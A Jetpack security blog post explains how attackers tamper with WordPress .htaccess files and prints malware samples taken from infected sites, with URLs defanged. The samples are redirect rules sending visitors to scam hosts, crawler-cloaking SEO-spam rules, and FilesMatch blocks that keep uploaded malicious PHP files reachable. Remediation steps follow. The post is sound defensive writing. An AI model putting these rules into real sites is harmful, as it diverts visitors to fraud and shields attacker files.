How Malware Can Abuse the .htaccess File

You learned about the importance of the .htaccess file in our blog post How to Access and Edit the Default WordPress .htaccess File. As you can imagine, an important file such as .htaccess can be a target for bad actors. In this article, we’ll point out cases and indicators of compromise that affect this file.

Malicious redirects

Attackers can setup redirects on the .htaccess files that will redirect visitors based on specific conditions. The final destination can be a website containing other malicious content, spam, phishing campains, or other types of scam.

Those redirects will rely on the function RewriteRule and will sometimes be preceeded by the conditions set by RewriteCond, just as a default .htaccess file would do. This can make spotting those bad codes hard for users that aren’t familiar with the website’s configuration.

Examples of this type of malware are (URLs were invalid):

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ hxxp://celeirodoalgarvio[.]com/azzf.html?h=717013 [L,R]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).txt$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
RewriteRule ^([A-Za-z0-9-]+).htm$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
</IfModule>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "iPhone|android"[NC]
RewriteRule ^(.*)$ hxxp://176[.]102[.]34[.]137/safezone [L,R=302]

SEO spam

Very similar to the malicious redirects case, this bad code will target search engines instead of the end user, redirecting their crawling attempts to malicious pages written to boost other websites, usually related to scams.

In the condition you’ll find it looking for the search engines on referrers and user-agents, as in the following example:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ default.php [L,QSA]
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA]
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA] 
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC] 
RewriteCond %{HTTP_REFERER} (bing|google|yahoo|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA]

Allowing bad code

Sometimes the attacker wants to make sure to protect the malicious file they uploaded to the site from competitors or other people poking around. Or they want to make sure that their malicious file will be opened by overriding the parent directory configuration.

For those cases a FilesMatch condition will be created and specific files or extensions will be listed, as in the example below:

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

What to do if my site was infected?

If you find the .htaccess file on your website was compromised the first thing you should do is to restore it to a working version, which will preserve your site’s permalinks and redirects. Please refer again to How to Access and Edit the Default WordPress .htaccess File. And then follow these steps:

  • Change all admin user’s passwords and make sure you’re using multi-factor authentication.
  • Review all WordPress users and remove the ones you don’t recognize (especially the admin ones).
  • Review for unused or unknown themes and plugins and remove anything unnecessary or unknown.
  • Reinstall all your plugins since they may have been compromised.
  • Review your theme for added or changed files that weren’t added or changed with your consent.
  • Reinstall WordPress core files.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

This entry was posted in Security, Vulnerabilities. Bookmark the permalink.

Fioravante Souza profile

Fioravante Souza

Explore the benefits of Jetpack

Learn how Jetpack can help you protect, speed up, and grow your WordPress site.

Get up to 50% off your first year.

Compare plans

Have a question?

Comments are closed for this article, but we're still here to help! Visit the support forum and we'll be happy to answer any questions.

View support forum
  • Enter your email address to follow this blog and receive news and updates from Jetpack!

    Join 112.3K other subscribers
  • Browse by Topic

  • %d bloggers like this: